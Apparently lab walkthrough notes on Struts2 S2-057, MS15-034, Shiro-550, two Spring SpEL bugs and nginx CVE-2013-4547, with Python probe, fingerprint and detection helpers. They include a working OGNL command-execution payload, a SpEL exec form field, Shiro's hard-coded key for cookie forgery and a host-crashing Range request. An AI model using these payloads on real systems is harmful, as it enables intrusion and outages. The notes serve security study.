Struts2 S2-057 remote code execution (CVE-2018-11776)
Open the lab.
Append ${(123+123)}/actionChain1.action to the URL. actionChain1 redirects using the namespace taken from the request, and on a vulnerable instance that namespace is evaluated as OGNL first, so the redirect's Location header contains /246/ where the expression was.
Capture the request and replace the namespace with the command-execution payload (URL-encoded, exactly as sent on the wire):
$%7B%0A%28%23dm%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%28@com.opensymphony.xwork2.ognl.OgnlUtil@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27whoami%27%29%29.%28@org.apache.commons.io.IOUtils@toString%28%23a.getInputStream%28%29%29%29%7D
Decoded, and broken across lines here for readability (on the wire it is one expression):
${
(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).
(#ct=#request['struts.valueStack'].context).
(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).
(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).
(#ou.getExcludedPackageNames().clear()).
(#ou.getExcludedClasses().clear()).
(#ct.setMemberAccess(#dm)).
(#a=@java.lang.Runtime@getRuntime().exec('whoami')).
(@org.apache.commons.io.IOUtils@toString(#a.getInputStream()))
}
The expression fetches OgnlUtil from the action container, clears its excluded-class and excluded-package lists, replaces the sandboxed member access with DEFAULT_MEMBER_ACCESS, runs whoami and returns the command's stdout in the response.
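Added helper (not from the original notes): it percent-encodes a namespace expression the way the payload above is encoded, builds the probe path, and reads the evaluated namespace back out of the redirect's Location header; the context path defaults to empty and the Location strings in the tests are constructed samples.

```python
import re
import urllib.error
import urllib.parse
import urllib.request
from typing import Optional

# The URL-encoded OGNL payload from the notes above, verbatim.
ENCODED_PAYLOAD = (
    "$%7B%0A%28%23dm%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29."
    "%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29."
    "%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29."
    "%28%23ou%3D%23cr.getInstance%28@com.opensymphony.xwork2.ognl.OgnlUtil@class%29%29."
    "%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29."
    "%28%23ou.getExcludedClasses%28%29.clear%28%29%29."
    "%28%23ct.setMemberAccess%28%23dm%29%29."
    "%28%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27whoami%27%29%29."
    "%28@org.apache.commons.io.IOUtils@toString%28%23a.getInputStream%28%29%29%29%7D"
)


def decode_payload(encoded: str) -> str:
    """Percent-decode a payload so the expression can be read."""
    return urllib.parse.unquote(encoded)


def encode_namespace(expr: str) -> str:
    """Percent-encode an OGNL expression for the request line. '$', '@' and '/' are left
    as-is, matching the notes' payload; { } ( ) # ' [ ] = and newlines get encoded."""
    return urllib.parse.quote(expr, safe="$@/")


def probe_path(expr: str = "${(123+123)}", action: str = "actionChain1.action", base: str = "") -> str:
    """Attacker-controlled namespace followed by the chaining action.
    `base` is the context path the app is deployed under (assumed empty here)."""
    return f"{base}/{encode_namespace(expr)}/{action}"


def namespace_from_location(location: str) -> Optional[str]:
    """Struts builds the redirect from the evaluated namespace plus the next action,
    so the path segment before the final action name is the OGNL result."""
    m = re.search(r"/([^/]+)/[^/]+$", location)
    return m.group(1) if m else None


def namespace_is_evaluated(location: str, expected: str) -> bool:
    return namespace_from_location(location) == expected


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Do not follow the 302 so the Location header can be inspected."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def probe(origin: str, expr: str = "${(123+123)}", expected: str = "246", timeout: float = 10.0) -> bool:
    """Live check against a lab host, e.g. probe("http://127.0.0.1:8080/struts2-showcase").
    Needs network access and is not exercised by the offline checks."""
    opener = urllib.request.build_opener(_NoRedirect)
    try:
        resp = opener.open(origin + probe_path(expr), timeout=timeout)
        location = resp.headers.get("Location", "")
    except urllib.error.HTTPError as err:  # the unfollowed 302 surfaces here
        location = err.headers.get("Location", "")
    return namespace_is_evaluated(location, expected)
```

Re-encoding the decoded payload with encode_namespace reproduces the notes' string byte for byte, which is a quick way to confirm a hand-edited command was encoded the same way.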
HTTP.sys remote code execution (MS15-034, CVE-2015-1635). The bulletin name reads MS = Microsoft, 15 = 2015, 034 = the 34th bulletin of that year.
Lab: Windows Server 2012 with IIS 8.5; run the Python PoC against it.
Once the script runs, the server blue-screens. HTTP.sys mishandles a Range header whose end offset is 18446744073709551615 (2^64-1) inside the kernel, so the public PoC is a denial of service rather than code execution, and it takes down the whole host, not just IIS.
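Added example (not part of the original notes): the raw Range request the PoC family sends, and a classifier for the answer. With start=0 the request is the non-destructive fingerprint (unpatched HTTP.sys answers 416, the fixed version 400); a non-zero start against a static file is the variant that crashes the host, so only run check_host against a lab machine. The sample response is constructed.

```python
import re
import socket

MAX_RANGE_END = 2**64 - 1  # 18446744073709551615: the 64-bit end offset HTTP.sys fails to bound-check


def build_range_request(host: str, path: str = "/", start: int = 0, end: int = MAX_RANGE_END) -> bytes:
    """Raw HTTP/1.1 request carrying the oversized Range header.
    start=0 only fingerprints; a non-zero start against a static file (e.g. /iisstart.htm)
    is the denial-of-service variant that blue-screens an unpatched server."""
    return (
        f"GET {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"Range: bytes={start}-{end}\r\n"
        "Connection: close\r\n\r\n"
    ).encode()


def status_code(raw_response: bytes) -> int:
    m = re.match(rb"HTTP/1\.[01] (\d{3})", raw_response)
    if m is None:
        raise ValueError("not an HTTP/1.x status line")
    return int(m.group(1))


def classify(raw_response: bytes) -> str:
    """Unpatched HTTP.sys accepts the range and answers 416 Requested Range Not Satisfiable;
    the MS15-034 fix rejects it with 400 Bad Request. Anything else is inconclusive."""
    code = status_code(raw_response)
    if code == 416:
        return "vulnerable"
    if code == 400:
        return "patched"
    return "unknown"


# Constructed sample of what an unpatched IIS 8.5 returns for the start=0 probe.
SAMPLE_VULNERABLE_RESPONSE = (
    b"HTTP/1.1 416 Requested Range Not Satisfiable\r\n"
    b"Server: Microsoft-IIS/8.5\r\n"
    b"Content-Length: 0\r\n\r\n"
)


def check_host(host: str, port: int = 80, path: str = "/", timeout: float = 5.0) -> str:
    """Send the non-destructive probe to a lab host and classify the answer (network; not run offline)."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_range_request(host, path))
        raw = sock.recv(4096)
    return classify(raw)
```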
Shiro rememberMe deserialization (Shiro-550, CVE-2016-4437)
Open the lab URL.
Capture the request.
Modify the cookie field and send the request to Repeater. The rememberMe cookie is base64(IV + AES-CBC(key, serialized Java object)), and Shiro 1.2.4 and earlier ship the hard-coded key kPH+bIxk5D2deZiIxcaaaA==, so anyone can encrypt a serialized gadget chain that Shiro will decrypt and deserialize. A response carrying Set-Cookie: rememberMe=deleteMe confirms the cookie reached Shiro.
Use an exploitation tool to generate the forged cookie and execute commands.
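Added helper (not from the original notes or from Shiro): the fingerprint check a practitioner runs before reaching for the tool, plus the cookie layout the tool produces. The AES-CBC encryption of the gadget chain itself is left to that tool; the header list is a constructed sample.

```python
import base64
from typing import List, Tuple

# Hard-coded AES key shipped in Shiro <= 1.2.4; 16 bytes, i.e. AES-128.
SHIRO_DEFAULT_KEY = base64.b64decode("kPH+bIxk5D2deZiIxcaaaA==")


def is_shiro(headers: List[Tuple[str, str]]) -> bool:
    """Fingerprint: when a request carries a rememberMe cookie Shiro cannot decrypt or
    deserialize, it clears it with Set-Cookie: rememberMe=deleteMe."""
    for name, value in headers:
        if name.lower() == "set-cookie" and value.split(";", 1)[0].strip() == "rememberMe=deleteMe":
            return True
    return False


def split_remember_me(cookie_value: str) -> Tuple[bytes, bytes]:
    """rememberMe = base64(IV || AES-CBC(key, serialized object)); returns (iv, ciphertext)."""
    raw = base64.b64decode(cookie_value)
    if len(raw) < 32 or len(raw) % 16:
        raise ValueError("not a 16-byte IV followed by whole AES blocks")
    return raw[:16], raw[16:]


def build_remember_me(iv: bytes, ciphertext: bytes) -> str:
    """Inverse of split_remember_me: the shape a forged cookie takes once a gadget chain has
    been AES-CBC-encrypted under SHIRO_DEFAULT_KEY (the encryption is done by the exploit tool)."""
    if len(iv) != 16 or len(ciphertext) % 16:
        raise ValueError("iv must be 16 bytes and ciphertext block-aligned")
    return base64.b64encode(iv + ciphertext).decode()


# Constructed response headers, as a Shiro application answers a bogus "rememberMe=1" cookie.
SAMPLE_HEADERS = [
    ("Content-Type", "text/html;charset=UTF-8"),
    ("Set-Cookie", "rememberMe=deleteMe; Path=/; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT"),
]
```

If is_shiro is false the target either is not Shiro or has the rememberMe cookie name changed, and a blind key attack is wasted effort.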
Spring Data REST remote command execution (CVE-2017-8046)
Open the target URL http://47.121.29.111:8080/customers/1
Capture the request and modify the data. The bug is in PATCH handling: the path of each JSON Patch operation (Content-Type: application/json-patch+json) is evaluated as a SpEL expression before the resource is updated, so an expression in that field runs on the server.
Spring code execution (CVE-2018-1273, Spring Data Commons)
Open the target URL.
Capture the registration request.
Add the following form data. MapDataBinder treats username[...] as a property path and evaluates the bracketed part as SpEL, so the command runs during request binding:
username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/zcc")]=&password=&repeatedPassword=
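Added detection example serving both the CVE-2017-8046 and CVE-2018-1273 entries (not from the notes or from Spring): a request-body scanner that flags SpEL fragments where only a property name or a JSON Patch path should be. The registration body is the one from the notes; the JSON Patch bodies and the marker list are constructed for this example.

```python
import json
import re
import urllib.parse
from typing import List

# Fragments that have no business in a form-field name (CVE-2018-1273) or a JSON Patch path (CVE-2017-8046).
SPEL_MARKERS = re.compile(
    r"#this\b|#root\b|\bT\(|\.getClass\(\)|java\.lang\.Runtime|\.forName\(|\.exec\("
)

# Registration body from the notes above.
REGISTER_BODY = (
    'username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/zcc")]'
    "=&password=&repeatedPassword="
)

# Constructed JSON Patch bodies: one carrying a SpEL expression in "path", one legitimate.
PATCH_WITH_SPEL = '[{"op": "replace", "path": "T(java.lang.Math).abs(-1)/firstName", "value": "x"}]'
PATCH_BENIGN = '[{"op": "replace", "path": "/firstName", "value": "x"}]'


def spel_in_property_paths(form_body: str) -> List[str]:
    """Field names of the form name[...] whose bracket contents look like SpEL.
    MapDataBinder evaluates exactly that bracketed part in vulnerable Spring Data Commons."""
    hits = []
    for key, _ in urllib.parse.parse_qsl(form_body, keep_blank_values=True):
        if "[" in key and SPEL_MARKERS.search(key):
            hits.append(key)
    return hits


def spel_in_json_patch(body: str) -> List[str]:
    """JSON Patch 'path' values that look like SpEL; vulnerable Spring Data REST evaluates them."""
    try:
        ops = json.loads(body)
    except ValueError:
        return []
    if not isinstance(ops, list):
        return []
    hits = []
    for op in ops:
        path = op.get("path", "") if isinstance(op, dict) else ""
        if isinstance(path, str) and SPEL_MARKERS.search(path):
            hits.append(path)
    return hits


def scan_request(content_type: str, body: str) -> List[str]:
    """Dispatch on Content-Type; returns the offending fragments (empty list = nothing found)."""
    ct = content_type.lower()
    if "json-patch+json" in ct:
        return spel_in_json_patch(body)
    if "x-www-form-urlencoded" in ct:
        return spel_in_property_paths(body)
    return []
```

The scanner only sees the decoded body, so run it after URL decoding but before the framework binds the data; a WAF rule that inspects the raw, still-encoded form will miss an encoded `%23this`.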
nginx file-name logic vulnerability (CVE-2013-4547)
Open the target URL.
Upload 1.jpg (containing PHP code) and capture the request.
Add a space after 1.jpg in the filename, so the server stores the file as "1.jpg " and the extension check still sees .jpg.
Forward the request, then request uploadfiles/1.jpg...php and capture that request.
In the hex view, change the two bytes after 1.jpg (2e 2e, the first two dots) to 20 00 (space, NUL). nginx 0.8.41 through 1.5.6 still matches the URI against location ~ \.php$ and hands it to PHP-FPM, which truncates SCRIPT_FILENAME at the NUL, so the stored "1.jpg " is executed as PHP.
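Added example (not from the notes, nginx or PHP): a simplified model of the two halves that combine into this bug, so the hex edit above can be reasoned about offline. The upload filter, document root and stored-file set are assumptions constructed for the example; the byte-level request target is the one the notes describe.

```python
import re
from typing import Optional, Set


def upload_filter_allows(filename: str) -> bool:
    """Simplified model of the lab's extension blacklist: it only inspects the literal suffix,
    so "1.jpg " (trailing space) passes even though it will later run as PHP."""
    return not filename.lower().endswith((".php", ".phtml"))


def craft_request_target(upload_dir: str, stored_name: str, ext: str = ".php") -> bytes:
    """The request path after the hex edit: "/uploadfiles/1.jpg" + " " + NUL + ".php".
    The bytes 20 00 stand where the first two dots of "1.jpg...php" were."""
    return upload_dir.encode() + stored_name.encode() + b"\x00" + ext.encode()


def php_location_matches(target: bytes) -> bool:
    """nginx 0.8.41 .. 1.5.6 accepted the unescaped space and NUL in the URI and matched
    `location ~ \\.php$` against the full path, NUL included."""
    return re.search(rb"\.php$", target) is not None


def fastcgi_script_filename(document_root: str, target: bytes) -> str:
    """SCRIPT_FILENAME = $document_root$fastcgi_script_name. PHP-FPM treats it as a C string,
    so everything from the NUL onward is dropped and the file that runs is ".../1.jpg " (with the space)."""
    full = document_root.encode() + target
    return full.split(b"\x00", 1)[0].decode()


def executes_as_php(document_root: str, target: bytes, stored_files: Set[str]) -> Optional[str]:
    """Which stored file PHP would execute for this request, or None if nginx never hands it to PHP
    or the truncated path does not exist."""
    if not php_location_matches(target):
        return None
    path = fastcgi_script_filename(document_root, target)
    return path if path in stored_files else None


def hex_bytes(data: bytes) -> str:
    """Hex view of the bytes, the way the proxy's hex editor shows them."""
    return " ".join(f"{b:02x}" for b in data)
```

php_location_matches is deliberately the vulnerable behaviour: fixed nginx (1.4.4 / 1.5.7) rejects the unescaped space, and setting security.limit_extensions in php-fpm to .php would refuse to run "1.jpg " even if the request got through.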